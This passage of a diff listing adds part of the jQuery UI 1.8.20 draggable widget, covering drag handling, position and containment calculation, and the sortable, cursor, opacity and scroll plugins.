.unbind(".draggable")
|
781 |
+
.removeClass("ui-draggable"
|
782 |
+
+ " ui-draggable-dragging"
|
783 |
+
+ " ui-draggable-disabled");
|
784 |
+
this._mouseDestroy();
|
785 |
+
|
786 |
+
return this;
|
787 |
+
},
|
788 |
+
|
789 |
+
_mouseCapture: function(event) {
|
790 |
+
|
791 |
+
var o = this.options;
|
792 |
+
|
793 |
+
// among others, prevent a drag on a resizable-handle
|
794 |
+
if (this.helper || o.disabled || $(event.target).is('.ui-resizable-handle'))
|
795 |
+
return false;
|
796 |
+
|
797 |
+
//Quit if we're not on a valid handle
|
798 |
+
this.handle = this._getHandle(event);
|
799 |
+
if (!this.handle)
|
800 |
+
return false;
|
801 |
+
|
802 |
+
if ( o.iframeFix ) {
|
803 |
+
$(o.iframeFix === true ? "iframe" : o.iframeFix).each(function() {
|
804 |
+
$('<div class="ui-draggable-iframeFix" style="background: #fff;"></div>')
|
805 |
+
.css({
|
806 |
+
width: this.offsetWidth+"px", height: this.offsetHeight+"px",
|
807 |
+
position: "absolute", opacity: "0.001", zIndex: 1000
|
808 |
+
})
|
809 |
+
.css($(this).offset())
|
810 |
+
.appendTo("body");
|
811 |
+
});
|
812 |
+
}
|
813 |
+
|
814 |
+
return true;
|
815 |
+
|
816 |
+
},
|
817 |
+
|
818 |
+
_mouseStart: function(event) {
|
819 |
+
|
820 |
+
var o = this.options;
|
821 |
+
|
822 |
+
//Create and append the visible helper
|
823 |
+
this.helper = this._createHelper(event);
|
824 |
+
|
825 |
+
//Cache the helper size
|
826 |
+
this._cacheHelperProportions();
|
827 |
+
|
828 |
+
//If ddmanager is used for droppables, set the global draggable
|
829 |
+
if($.ui.ddmanager)
|
830 |
+
$.ui.ddmanager.current = this;
|
831 |
+
|
832 |
+
/*
|
833 |
+
* - Position generation -
|
834 |
+
* This block generates everything position related - it's the core of draggables.
|
835 |
+
*/
|
836 |
+
|
837 |
+
//Cache the margins of the original element
|
838 |
+
this._cacheMargins();
|
839 |
+
|
840 |
+
//Store the helper's css position
|
841 |
+
this.cssPosition = this.helper.css("position");
|
842 |
+
this.scrollParent = this.helper.scrollParent();
|
843 |
+
|
844 |
+
//The element's absolute position on the page minus margins
|
845 |
+
this.offset = this.positionAbs = this.element.offset();
|
846 |
+
this.offset = {
|
847 |
+
top: this.offset.top - this.margins.top,
|
848 |
+
left: this.offset.left - this.margins.left
|
849 |
+
};
|
850 |
+
|
851 |
+
$.extend(this.offset, {
|
852 |
+
click: { //Where the click happened, relative to the element
|
853 |
+
left: event.pageX - this.offset.left,
|
854 |
+
top: event.pageY - this.offset.top
|
855 |
+
},
|
856 |
+
parent: this._getParentOffset(),
|
857 |
+
relative: this._getRelativeOffset() //This is a relative to absolute position minus the actual position calculation - only used for relative positioned helper
|
858 |
+
});
|
859 |
+
|
860 |
+
//Generate the original position
|
861 |
+
this.originalPosition = this.position = this._generatePosition(event);
|
862 |
+
this.originalPageX = event.pageX;
|
863 |
+
this.originalPageY = event.pageY;
|
864 |
+
|
865 |
+
//Adjust the mouse offset relative to the helper if 'cursorAt' is supplied
|
866 |
+
(o.cursorAt && this._adjustOffsetFromHelper(o.cursorAt));
|
867 |
+
|
868 |
+
//Set a containment if given in the options
|
869 |
+
if(o.containment)
|
870 |
+
this._setContainment();
|
871 |
+
|
872 |
+
//Trigger event + callbacks
|
873 |
+
if(this._trigger("start", event) === false) {
|
874 |
+
this._clear();
|
875 |
+
return false;
|
876 |
+
}
|
877 |
+
|
878 |
+
//Recache the helper size
|
879 |
+
this._cacheHelperProportions();
|
880 |
+
|
881 |
+
//Prepare the droppable offsets
|
882 |
+
if ($.ui.ddmanager && !o.dropBehaviour)
|
883 |
+
$.ui.ddmanager.prepareOffsets(this, event);
|
884 |
+
|
885 |
+
this.helper.addClass("ui-draggable-dragging");
|
886 |
+
this._mouseDrag(event, true); //Execute the drag once - this causes the helper not to be visible before getting its correct position
|
887 |
+
|
888 |
+
//If the ddmanager is used for droppables, inform the manager that dragging has started (see #5003)
|
889 |
+
if ( $.ui.ddmanager ) $.ui.ddmanager.dragStart(this, event);
|
890 |
+
|
891 |
+
return true;
|
892 |
+
},
|
893 |
+
|
894 |
+
_mouseDrag: function(event, noPropagation) {
|
895 |
+
|
896 |
+
//Compute the helpers position
|
897 |
+
this.position = this._generatePosition(event);
|
898 |
+
this.positionAbs = this._convertPositionTo("absolute");
|
899 |
+
|
900 |
+
//Call plugins and callbacks and use the resulting position if something is returned
|
901 |
+
if (!noPropagation) {
|
902 |
+
var ui = this._uiHash();
|
903 |
+
if(this._trigger('drag', event, ui) === false) {
|
904 |
+
this._mouseUp({});
|
905 |
+
return false;
|
906 |
+
}
|
907 |
+
this.position = ui.position;
|
908 |
+
}
|
909 |
+
|
910 |
+
if(!this.options.axis || this.options.axis != "y") this.helper[0].style.left = this.position.left+'px';
|
911 |
+
if(!this.options.axis || this.options.axis != "x") this.helper[0].style.top = this.position.top+'px';
|
912 |
+
if($.ui.ddmanager) $.ui.ddmanager.drag(this, event);
|
913 |
+
|
914 |
+
return false;
|
915 |
+
},
|
916 |
+
|
917 |
+
_mouseStop: function(event) {
|
918 |
+
|
919 |
+
//If we are using droppables, inform the manager about the drop
|
920 |
+
var dropped = false;
|
921 |
+
if ($.ui.ddmanager && !this.options.dropBehaviour)
|
922 |
+
dropped = $.ui.ddmanager.drop(this, event);
|
923 |
+
|
924 |
+
//if a drop comes from outside (a sortable)
|
925 |
+
if(this.dropped) {
|
926 |
+
dropped = this.dropped;
|
927 |
+
this.dropped = false;
|
928 |
+
}
|
929 |
+
|
930 |
+
//if the original element is no longer in the DOM don't bother to continue (see #8269)
|
931 |
+
var element = this.element[0], elementInDom = false;
|
932 |
+
while ( element && (element = element.parentNode) ) {
|
933 |
+
if (element == document ) {
|
934 |
+
elementInDom = true;
|
935 |
+
}
|
936 |
+
}
|
937 |
+
if ( !elementInDom && this.options.helper === "original" )
|
938 |
+
return false;
|
939 |
+
|
940 |
+
if((this.options.revert == "invalid" && !dropped) || (this.options.revert == "valid" && dropped) || this.options.revert === true || ($.isFunction(this.options.revert) && this.options.revert.call(this.element, dropped))) {
|
941 |
+
var self = this;
|
942 |
+
$(this.helper).animate(this.originalPosition, parseInt(this.options.revertDuration, 10), function() {
|
943 |
+
if(self._trigger("stop", event) !== false) {
|
944 |
+
self._clear();
|
945 |
+
}
|
946 |
+
});
|
947 |
+
} else {
|
948 |
+
if(this._trigger("stop", event) !== false) {
|
949 |
+
this._clear();
|
950 |
+
}
|
951 |
+
}
|
952 |
+
|
953 |
+
return false;
|
954 |
+
},
|
955 |
+
|
956 |
+
_mouseUp: function(event) {
|
957 |
+
if (this.options.iframeFix === true) {
|
958 |
+
$("div.ui-draggable-iframeFix").each(function() {
|
959 |
+
this.parentNode.removeChild(this);
|
960 |
+
}); //Remove frame helpers
|
961 |
+
}
|
962 |
+
|
963 |
+
//If the ddmanager is used for droppables, inform the manager that dragging has stopped (see #5003)
|
964 |
+
if( $.ui.ddmanager ) $.ui.ddmanager.dragStop(this, event);
|
965 |
+
|
966 |
+
return $.ui.mouse.prototype._mouseUp.call(this, event);
|
967 |
+
},
|
968 |
+
|
969 |
+
cancel: function() {
|
970 |
+
|
971 |
+
if(this.helper.is(".ui-draggable-dragging")) {
|
972 |
+
this._mouseUp({});
|
973 |
+
} else {
|
974 |
+
this._clear();
|
975 |
+
}
|
976 |
+
|
977 |
+
return this;
|
978 |
+
|
979 |
+
},
|
980 |
+
|
981 |
+
_getHandle: function(event) {
|
982 |
+
|
983 |
+
var handle = !this.options.handle || !$(this.options.handle, this.element).length ? true : false;
|
984 |
+
$(this.options.handle, this.element)
|
985 |
+
.find("*")
|
986 |
+
.andSelf()
|
987 |
+
.each(function() {
|
988 |
+
if(this == event.target) handle = true;
|
989 |
+
});
|
990 |
+
|
991 |
+
return handle;
|
992 |
+
|
993 |
+
},
|
994 |
+
|
995 |
+
_createHelper: function(event) {
|
996 |
+
|
997 |
+
var o = this.options;
|
998 |
+
var helper = $.isFunction(o.helper) ? $(o.helper.apply(this.element[0], [event])) : (o.helper == 'clone' ? this.element.clone().removeAttr('id') : this.element);
|
999 |
+
|
1000 |
+
if(!helper.parents('body').length)
|
1001 |
+
helper.appendTo((o.appendTo == 'parent' ? this.element[0].parentNode : o.appendTo));
|
1002 |
+
|
1003 |
+
if(helper[0] != this.element[0] && !(/(fixed|absolute)/).test(helper.css("position")))
|
1004 |
+
helper.css("position", "absolute");
|
1005 |
+
|
1006 |
+
return helper;
|
1007 |
+
|
1008 |
+
},
|
1009 |
+
|
1010 |
+
_adjustOffsetFromHelper: function(obj) {
|
1011 |
+
if (typeof obj == 'string') {
|
1012 |
+
obj = obj.split(' ');
|
1013 |
+
}
|
1014 |
+
if ($.isArray(obj)) {
|
1015 |
+
obj = {left: +obj[0], top: +obj[1] || 0};
|
1016 |
+
}
|
1017 |
+
if ('left' in obj) {
|
1018 |
+
this.offset.click.left = obj.left + this.margins.left;
|
1019 |
+
}
|
1020 |
+
if ('right' in obj) {
|
1021 |
+
this.offset.click.left = this.helperProportions.width - obj.right + this.margins.left;
|
1022 |
+
}
|
1023 |
+
if ('top' in obj) {
|
1024 |
+
this.offset.click.top = obj.top + this.margins.top;
|
1025 |
+
}
|
1026 |
+
if ('bottom' in obj) {
|
1027 |
+
this.offset.click.top = this.helperProportions.height - obj.bottom + this.margins.top;
|
1028 |
+
}
|
1029 |
+
},
|
1030 |
+
|
1031 |
+
_getParentOffset: function() {
|
1032 |
+
|
1033 |
+
//Get the offsetParent and cache its position
|
1034 |
+
this.offsetParent = this.helper.offsetParent();
|
1035 |
+
var po = this.offsetParent.offset();
|
1036 |
+
|
1037 |
+
// This is a special case where we need to modify a offset calculated on start, since the following happened:
|
1038 |
+
// 1. The position of the helper is absolute, so it's position is calculated based on the next positioned parent
|
1039 |
+
// 2. The actual offset parent is a child of the scroll parent, and the scroll parent isn't the document, which means that
|
1040 |
+
// the scroll is included in the initial calculation of the offset of the parent, and never recalculated upon drag
|
1041 |
+
if(this.cssPosition == 'absolute' && this.scrollParent[0] != document && $.ui.contains(this.scrollParent[0], this.offsetParent[0])) {
|
1042 |
+
po.left += this.scrollParent.scrollLeft();
|
1043 |
+
po.top += this.scrollParent.scrollTop();
|
1044 |
+
}
|
1045 |
+
|
1046 |
+
if((this.offsetParent[0] == document.body) //This needs to be actually done for all browsers, since pageX/pageY includes this information
|
1047 |
+
|| (this.offsetParent[0].tagName && this.offsetParent[0].tagName.toLowerCase() == 'html' && $.browser.msie)) //Ugly IE fix
|
1048 |
+
po = { top: 0, left: 0 };
|
1049 |
+
|
1050 |
+
return {
|
1051 |
+
top: po.top + (parseInt(this.offsetParent.css("borderTopWidth"),10) || 0),
|
1052 |
+
left: po.left + (parseInt(this.offsetParent.css("borderLeftWidth"),10) || 0)
|
1053 |
+
};
|
1054 |
+
|
1055 |
+
},
|
1056 |
+
|
1057 |
+
_getRelativeOffset: function() {
|
1058 |
+
|
1059 |
+
if(this.cssPosition == "relative") {
|
1060 |
+
var p = this.element.position();
|
1061 |
+
return {
|
1062 |
+
top: p.top - (parseInt(this.helper.css("top"),10) || 0) + this.scrollParent.scrollTop(),
|
1063 |
+
left: p.left - (parseInt(this.helper.css("left"),10) || 0) + this.scrollParent.scrollLeft()
|
1064 |
+
};
|
1065 |
+
} else {
|
1066 |
+
return { top: 0, left: 0 };
|
1067 |
+
}
|
1068 |
+
|
1069 |
+
},
|
1070 |
+
|
1071 |
+
_cacheMargins: function() {
|
1072 |
+
this.margins = {
|
1073 |
+
left: (parseInt(this.element.css("marginLeft"),10) || 0),
|
1074 |
+
top: (parseInt(this.element.css("marginTop"),10) || 0),
|
1075 |
+
right: (parseInt(this.element.css("marginRight"),10) || 0),
|
1076 |
+
bottom: (parseInt(this.element.css("marginBottom"),10) || 0)
|
1077 |
+
};
|
1078 |
+
},
|
1079 |
+
|
1080 |
+
_cacheHelperProportions: function() {
|
1081 |
+
this.helperProportions = {
|
1082 |
+
width: this.helper.outerWidth(),
|
1083 |
+
height: this.helper.outerHeight()
|
1084 |
+
};
|
1085 |
+
},
|
1086 |
+
|
1087 |
+
_setContainment: function() {
|
1088 |
+
|
1089 |
+
var o = this.options;
|
1090 |
+
if(o.containment == 'parent') o.containment = this.helper[0].parentNode;
|
1091 |
+
if(o.containment == 'document' || o.containment == 'window') this.containment = [
|
1092 |
+
o.containment == 'document' ? 0 : $(window).scrollLeft() - this.offset.relative.left - this.offset.parent.left,
|
1093 |
+
o.containment == 'document' ? 0 : $(window).scrollTop() - this.offset.relative.top - this.offset.parent.top,
|
1094 |
+
(o.containment == 'document' ? 0 : $(window).scrollLeft()) + $(o.containment == 'document' ? document : window).width() - this.helperProportions.width - this.margins.left,
|
1095 |
+
(o.containment == 'document' ? 0 : $(window).scrollTop()) + ($(o.containment == 'document' ? document : window).height() || document.body.parentNode.scrollHeight) - this.helperProportions.height - this.margins.top
|
1096 |
+
];
|
1097 |
+
|
1098 |
+
if(!(/^(document|window|parent)$/).test(o.containment) && o.containment.constructor != Array) {
|
1099 |
+
var c = $(o.containment);
|
1100 |
+
var ce = c[0]; if(!ce) return;
|
1101 |
+
var co = c.offset();
|
1102 |
+
var over = ($(ce).css("overflow") != 'hidden');
|
1103 |
+
|
1104 |
+
this.containment = [
|
1105 |
+
(parseInt($(ce).css("borderLeftWidth"),10) || 0) + (parseInt($(ce).css("paddingLeft"),10) || 0),
|
1106 |
+
(parseInt($(ce).css("borderTopWidth"),10) || 0) + (parseInt($(ce).css("paddingTop"),10) || 0),
|
1107 |
+
(over ? Math.max(ce.scrollWidth,ce.offsetWidth) : ce.offsetWidth) - (parseInt($(ce).css("borderLeftWidth"),10) || 0) - (parseInt($(ce).css("paddingRight"),10) || 0) - this.helperProportions.width - this.margins.left - this.margins.right,
|
1108 |
+
(over ? Math.max(ce.scrollHeight,ce.offsetHeight) : ce.offsetHeight) - (parseInt($(ce).css("borderTopWidth"),10) || 0) - (parseInt($(ce).css("paddingBottom"),10) || 0) - this.helperProportions.height - this.margins.top - this.margins.bottom
|
1109 |
+
];
|
1110 |
+
this.relative_container = c;
|
1111 |
+
|
1112 |
+
} else if(o.containment.constructor == Array) {
|
1113 |
+
this.containment = o.containment;
|
1114 |
+
}
|
1115 |
+
|
1116 |
+
},
|
1117 |
+
|
1118 |
+
_convertPositionTo: function(d, pos) {
|
1119 |
+
|
1120 |
+
if(!pos) pos = this.position;
|
1121 |
+
var mod = d == "absolute" ? 1 : -1;
|
1122 |
+
var o = this.options, scroll = this.cssPosition == 'absolute' && !(this.scrollParent[0] != document && $.ui.contains(this.scrollParent[0], this.offsetParent[0])) ? this.offsetParent : this.scrollParent, scrollIsRootNode = (/(html|body)/i).test(scroll[0].tagName);
|
1123 |
+
|
1124 |
+
return {
|
1125 |
+
top: (
|
1126 |
+
pos.top // The absolute mouse position
|
1127 |
+
+ this.offset.relative.top * mod // Only for relative positioned nodes: Relative offset from element to offset parent
|
1128 |
+
+ this.offset.parent.top * mod // The offsetParent's offset without borders (offset + border)
|
1129 |
+
- ($.browser.safari && $.browser.version < 526 && this.cssPosition == 'fixed' ? 0 : ( this.cssPosition == 'fixed' ? -this.scrollParent.scrollTop() : ( scrollIsRootNode ? 0 : scroll.scrollTop() ) ) * mod)
|
1130 |
+
),
|
1131 |
+
left: (
|
1132 |
+
pos.left // The absolute mouse position
|
1133 |
+
+ this.offset.relative.left * mod // Only for relative positioned nodes: Relative offset from element to offset parent
|
1134 |
+
+ this.offset.parent.left * mod // The offsetParent's offset without borders (offset + border)
|
1135 |
+
- ($.browser.safari && $.browser.version < 526 && this.cssPosition == 'fixed' ? 0 : ( this.cssPosition == 'fixed' ? -this.scrollParent.scrollLeft() : scrollIsRootNode ? 0 : scroll.scrollLeft() ) * mod)
|
1136 |
+
)
|
1137 |
+
};
|
1138 |
+
|
1139 |
+
},
|
1140 |
+
|
1141 |
+
_generatePosition: function(event) {
|
1142 |
+
|
1143 |
+
var o = this.options, scroll = this.cssPosition == 'absolute' && !(this.scrollParent[0] != document && $.ui.contains(this.scrollParent[0], this.offsetParent[0])) ? this.offsetParent : this.scrollParent, scrollIsRootNode = (/(html|body)/i).test(scroll[0].tagName);
|
1144 |
+
var pageX = event.pageX;
|
1145 |
+
var pageY = event.pageY;
|
1146 |
+
|
1147 |
+
/*
|
1148 |
+
* - Position constraining -
|
1149 |
+
* Constrain the position to a mix of grid, containment.
|
1150 |
+
*/
|
1151 |
+
|
1152 |
+
if(this.originalPosition) { //If we are not dragging yet, we won't check for options
|
1153 |
+
var containment;
|
1154 |
+
if(this.containment) {
|
1155 |
+
if (this.relative_container){
|
1156 |
+
var co = this.relative_container.offset();
|
1157 |
+
containment = [ this.containment[0] + co.left,
|
1158 |
+
this.containment[1] + co.top,
|
1159 |
+
this.containment[2] + co.left,
|
1160 |
+
this.containment[3] + co.top ];
|
1161 |
+
}
|
1162 |
+
else {
|
1163 |
+
containment = this.containment;
|
1164 |
+
}
|
1165 |
+
|
1166 |
+
if(event.pageX - this.offset.click.left < containment[0]) pageX = containment[0] + this.offset.click.left;
|
1167 |
+
if(event.pageY - this.offset.click.top < containment[1]) pageY = containment[1] + this.offset.click.top;
|
1168 |
+
if(event.pageX - this.offset.click.left > containment[2]) pageX = containment[2] + this.offset.click.left;
|
1169 |
+
if(event.pageY - this.offset.click.top > containment[3]) pageY = containment[3] + this.offset.click.top;
|
1170 |
+
}
|
1171 |
+
|
1172 |
+
if(o.grid) {
|
1173 |
+
//Check for grid elements set to 0 to prevent divide by 0 error causing invalid argument errors in IE (see ticket #6950)
|
1174 |
+
var top = o.grid[1] ? this.originalPageY + Math.round((pageY - this.originalPageY) / o.grid[1]) * o.grid[1] : this.originalPageY;
|
1175 |
+
pageY = containment ? (!(top - this.offset.click.top < containment[1] || top - this.offset.click.top > containment[3]) ? top : (!(top - this.offset.click.top < containment[1]) ? top - o.grid[1] : top + o.grid[1])) : top;
|
1176 |
+
|
1177 |
+
var left = o.grid[0] ? this.originalPageX + Math.round((pageX - this.originalPageX) / o.grid[0]) * o.grid[0] : this.originalPageX;
|
1178 |
+
pageX = containment ? (!(left - this.offset.click.left < containment[0] || left - this.offset.click.left > containment[2]) ? left : (!(left - this.offset.click.left < containment[0]) ? left - o.grid[0] : left + o.grid[0])) : left;
|
1179 |
+
}
|
1180 |
+
|
1181 |
+
}
|
1182 |
+
|
1183 |
+
return {
|
1184 |
+
top: (
|
1185 |
+
pageY // The absolute mouse position
|
1186 |
+
- this.offset.click.top // Click offset (relative to the element)
|
1187 |
+
- this.offset.relative.top // Only for relative positioned nodes: Relative offset from element to offset parent
|
1188 |
+
- this.offset.parent.top // The offsetParent's offset without borders (offset + border)
|
1189 |
+
+ ($.browser.safari && $.browser.version < 526 && this.cssPosition == 'fixed' ? 0 : ( this.cssPosition == 'fixed' ? -this.scrollParent.scrollTop() : ( scrollIsRootNode ? 0 : scroll.scrollTop() ) ))
|
1190 |
+
),
|
1191 |
+
left: (
|
1192 |
+
pageX // The absolute mouse position
|
1193 |
+
- this.offset.click.left // Click offset (relative to the element)
|
1194 |
+
- this.offset.relative.left // Only for relative positioned nodes: Relative offset from element to offset parent
|
1195 |
+
- this.offset.parent.left // The offsetParent's offset without borders (offset + border)
|
1196 |
+
+ ($.browser.safari && $.browser.version < 526 && this.cssPosition == 'fixed' ? 0 : ( this.cssPosition == 'fixed' ? -this.scrollParent.scrollLeft() : scrollIsRootNode ? 0 : scroll.scrollLeft() ))
|
1197 |
+
)
|
1198 |
+
};
|
1199 |
+
|
1200 |
+
},
|
1201 |
+
|
1202 |
+
_clear: function() {
|
1203 |
+
this.helper.removeClass("ui-draggable-dragging");
|
1204 |
+
if(this.helper[0] != this.element[0] && !this.cancelHelperRemoval) this.helper.remove();
|
1205 |
+
//if($.ui.ddmanager) $.ui.ddmanager.current = null;
|
1206 |
+
this.helper = null;
|
1207 |
+
this.cancelHelperRemoval = false;
|
1208 |
+
},
|
1209 |
+
|
1210 |
+
// From now on bulk stuff - mainly helpers
|
1211 |
+
|
1212 |
+
_trigger: function(type, event, ui) {
|
1213 |
+
ui = ui || this._uiHash();
|
1214 |
+
$.ui.plugin.call(this, type, [event, ui]);
|
1215 |
+
if(type == "drag") this.positionAbs = this._convertPositionTo("absolute"); //The absolute position has to be recalculated after plugins
|
1216 |
+
return $.Widget.prototype._trigger.call(this, type, event, ui);
|
1217 |
+
},
|
1218 |
+
|
1219 |
+
plugins: {},
|
1220 |
+
|
1221 |
+
_uiHash: function(event) {
|
1222 |
+
return {
|
1223 |
+
helper: this.helper,
|
1224 |
+
position: this.position,
|
1225 |
+
originalPosition: this.originalPosition,
|
1226 |
+
offset: this.positionAbs
|
1227 |
+
};
|
1228 |
+
}
|
1229 |
+
|
1230 |
+
});
|
1231 |
+
|
1232 |
+
$.extend($.ui.draggable, {
|
1233 |
+
version: "1.8.20"
|
1234 |
+
});
|
1235 |
+
|
1236 |
+
$.ui.plugin.add("draggable", "connectToSortable", {
|
1237 |
+
start: function(event, ui) {
|
1238 |
+
|
1239 |
+
var inst = $(this).data("draggable"), o = inst.options,
|
1240 |
+
uiSortable = $.extend({}, ui, { item: inst.element });
|
1241 |
+
inst.sortables = [];
|
1242 |
+
$(o.connectToSortable).each(function() {
|
1243 |
+
var sortable = $.data(this, 'sortable');
|
1244 |
+
if (sortable && !sortable.options.disabled) {
|
1245 |
+
inst.sortables.push({
|
1246 |
+
instance: sortable,
|
1247 |
+
shouldRevert: sortable.options.revert
|
1248 |
+
});
|
1249 |
+
sortable.refreshPositions(); // Call the sortable's refreshPositions at drag start to refresh the containerCache since the sortable container cache is used in drag and needs to be up to date (this will ensure it's initialised as well as being kept in step with any changes that might have happened on the page).
|
1250 |
+
sortable._trigger("activate", event, uiSortable);
|
1251 |
+
}
|
1252 |
+
});
|
1253 |
+
|
1254 |
+
},
|
1255 |
+
stop: function(event, ui) {
|
1256 |
+
|
1257 |
+
//If we are still over the sortable, we fake the stop event of the sortable, but also remove helper
|
1258 |
+
var inst = $(this).data("draggable"),
|
1259 |
+
uiSortable = $.extend({}, ui, { item: inst.element });
|
1260 |
+
|
1261 |
+
$.each(inst.sortables, function() {
|
1262 |
+
if(this.instance.isOver) {
|
1263 |
+
|
1264 |
+
this.instance.isOver = 0;
|
1265 |
+
|
1266 |
+
inst.cancelHelperRemoval = true; //Don't remove the helper in the draggable instance
|
1267 |
+
this.instance.cancelHelperRemoval = false; //Remove it in the sortable instance (so sortable plugins like revert still work)
|
1268 |
+
|
1269 |
+
//The sortable revert is supported, and we have to set a temporary dropped variable on the draggable to support revert: 'valid/invalid'
|
1270 |
+
if(this.shouldRevert) this.instance.options.revert = true;
|
1271 |
+
|
1272 |
+
//Trigger the stop of the sortable
|
1273 |
+
this.instance._mouseStop(event);
|
1274 |
+
|
1275 |
+
this.instance.options.helper = this.instance.options._helper;
|
1276 |
+
|
1277 |
+
//If the helper has been the original item, restore properties in the sortable
|
1278 |
+
if(inst.options.helper == 'original')
|
1279 |
+
this.instance.currentItem.css({ top: 'auto', left: 'auto' });
|
1280 |
+
|
1281 |
+
} else {
|
1282 |
+
this.instance.cancelHelperRemoval = false; //Remove the helper in the sortable instance
|
1283 |
+
this.instance._trigger("deactivate", event, uiSortable);
|
1284 |
+
}
|
1285 |
+
|
1286 |
+
});
|
1287 |
+
|
1288 |
+
},
|
1289 |
+
drag: function(event, ui) {
|
1290 |
+
|
1291 |
+
var inst = $(this).data("draggable"), self = this;
|
1292 |
+
|
1293 |
+
var checkPos = function(o) {
|
1294 |
+
var dyClick = this.offset.click.top, dxClick = this.offset.click.left;
|
1295 |
+
var helperTop = this.positionAbs.top, helperLeft = this.positionAbs.left;
|
1296 |
+
var itemHeight = o.height, itemWidth = o.width;
|
1297 |
+
var itemTop = o.top, itemLeft = o.left;
|
1298 |
+
|
1299 |
+
return $.ui.isOver(helperTop + dyClick, helperLeft + dxClick, itemTop, itemLeft, itemHeight, itemWidth);
|
1300 |
+
};
|
1301 |
+
|
1302 |
+
$.each(inst.sortables, function(i) {
|
1303 |
+
|
1304 |
+
//Copy over some variables to allow calling the sortable's native _intersectsWith
|
1305 |
+
this.instance.positionAbs = inst.positionAbs;
|
1306 |
+
this.instance.helperProportions = inst.helperProportions;
|
1307 |
+
this.instance.offset.click = inst.offset.click;
|
1308 |
+
|
1309 |
+
if(this.instance._intersectsWith(this.instance.containerCache)) {
|
1310 |
+
|
1311 |
+
//If it intersects, we use a little isOver variable and set it once, so our move-in stuff gets fired only once
|
1312 |
+
if(!this.instance.isOver) {
|
1313 |
+
|
1314 |
+
this.instance.isOver = 1;
|
1315 |
+
//Now we fake the start of dragging for the sortable instance,
|
1316 |
+
//by cloning the list group item, appending it to the sortable and using it as inst.currentItem
|
1317 |
+
//We can then fire the start event of the sortable with our passed browser event, and our own helper (so it doesn't create a new one)
|
1318 |
+
this.instance.currentItem = $(self).clone().removeAttr('id').appendTo(this.instance.element).data("sortable-item", true);
|
1319 |
+
this.instance.options._helper = this.instance.options.helper; //Store helper option to later restore it
|
1320 |
+
this.instance.options.helper = function() { return ui.helper[0]; };
|
1321 |
+
|
1322 |
+
event.target = this.instance.currentItem[0];
|
1323 |
+
this.instance._mouseCapture(event, true);
|
1324 |
+
this.instance._mouseStart(event, true, true);
|
1325 |
+
|
1326 |
+
//Because the browser event is way off the new appended portlet, we modify a couple of variables to reflect the changes
|
1327 |
+
this.instance.offset.click.top = inst.offset.click.top;
|
1328 |
+
this.instance.offset.click.left = inst.offset.click.left;
|
1329 |
+
this.instance.offset.parent.left -= inst.offset.parent.left - this.instance.offset.parent.left;
|
1330 |
+
this.instance.offset.parent.top -= inst.offset.parent.top - this.instance.offset.parent.top;
|
1331 |
+
|
1332 |
+
inst._trigger("toSortable", event);
|
1333 |
+
inst.dropped = this.instance.element; //draggable revert needs that
|
1334 |
+
//hack so receive/update callbacks work (mostly)
|
1335 |
+
inst.currentItem = inst.element;
|
1336 |
+
this.instance.fromOutside = inst;
|
1337 |
+
|
1338 |
+
}
|
1339 |
+
|
1340 |
+
//Provided we did all the previous steps, we can fire the drag event of the sortable on every draggable drag, when it intersects with the sortable
|
1341 |
+
if(this.instance.currentItem) this.instance._mouseDrag(event);
|
1342 |
+
|
1343 |
+
} else {
|
1344 |
+
|
1345 |
+
//If it doesn't intersect with the sortable, and it intersected before,
|
1346 |
+
//we fake the drag stop of the sortable, but make sure it doesn't remove the helper by using cancelHelperRemoval
|
1347 |
+
if(this.instance.isOver) {
|
1348 |
+
|
1349 |
+
this.instance.isOver = 0;
|
1350 |
+
this.instance.cancelHelperRemoval = true;
|
1351 |
+
|
1352 |
+
//Prevent reverting on this forced stop
|
1353 |
+
this.instance.options.revert = false;
|
1354 |
+
|
1355 |
+
// The out event needs to be triggered independently
|
1356 |
+
this.instance._trigger('out', event, this.instance._uiHash(this.instance));
|
1357 |
+
|
1358 |
+
this.instance._mouseStop(event, true);
|
1359 |
+
this.instance.options.helper = this.instance.options._helper;
|
1360 |
+
|
1361 |
+
//Now we remove our currentItem, the list group clone again, and the placeholder, and animate the helper back to it's original size
|
1362 |
+
this.instance.currentItem.remove();
|
1363 |
+
if(this.instance.placeholder) this.instance.placeholder.remove();
|
1364 |
+
|
1365 |
+
inst._trigger("fromSortable", event);
|
1366 |
+
inst.dropped = false; //draggable revert needs that
|
1367 |
+
}
|
1368 |
+
|
1369 |
+
};
|
1370 |
+
|
1371 |
+
});
|
1372 |
+
|
1373 |
+
}
|
1374 |
+
});
|
1375 |
+
|
1376 |
+
$.ui.plugin.add("draggable", "cursor", {
|
1377 |
+
start: function(event, ui) {
|
1378 |
+
var t = $('body'), o = $(this).data('draggable').options;
|
1379 |
+
if (t.css("cursor")) o._cursor = t.css("cursor");
|
1380 |
+
t.css("cursor", o.cursor);
|
1381 |
+
},
|
1382 |
+
stop: function(event, ui) {
|
1383 |
+
var o = $(this).data('draggable').options;
|
1384 |
+
if (o._cursor) $('body').css("cursor", o._cursor);
|
1385 |
+
}
|
1386 |
+
});
|
1387 |
+
|
1388 |
+
$.ui.plugin.add("draggable", "opacity", {
|
1389 |
+
start: function(event, ui) {
|
1390 |
+
var t = $(ui.helper), o = $(this).data('draggable').options;
|
1391 |
+
if(t.css("opacity")) o._opacity = t.css("opacity");
|
1392 |
+
t.css('opacity', o.opacity);
|
1393 |
+
},
|
1394 |
+
stop: function(event, ui) {
|
1395 |
+
var o = $(this).data('draggable').options;
|
1396 |
+
if(o._opacity) $(ui.helper).css('opacity', o._opacity);
|
1397 |
+
}
|
1398 |
+
});
|
1399 |
+
|
1400 |
+
$.ui.plugin.add("draggable", "scroll", {
|
1401 |
+
start: function(event, ui) {
|
1402 |
+
var i = $(this).data("draggable");
|
1403 |
+
if(i.scrollParent[0] != document && i.scrollParent[0].tagName != 'HTML') i.overflowOffset = i.scrollParent.offset();
|
1404 |
+
},
|
1405 |
+
drag: function(event, ui) {
|
1406 |
+
|
1407 |
+
var i = $(this).data("draggable"), o = i.options, scrolled = false;
|
1408 |
+
|
1409 |
+
if(i.scrollParent[0] != document && i.scrollParent[0].tagName != 'HTML') {
|
1410 |
+
|
1411 |
+
if(!o.axis || o.axis != 'x') {
|
1412 |
+
if((i.overflowOffset.top + i.scrollParent[0].offsetHeight) - event.pageY < o.scrollSensitivity)
|
1413 |
+
i.scrollParent[0].scrollTop = scrolled = i.scrollParent[0].scrollTop + o.scrollSpeed;
|
1414 |
+
else if(event.pageY - i.overflowOffset.top < o.scrollSensitivity)
|
1415 |
+
i.scrollParent[0].scrollTop = scrolled = i.scrollParent[0].scrollTop - o.scrollSpeed;
|
1416 |
+
}
|
1417 |
+
|
1418 |
+
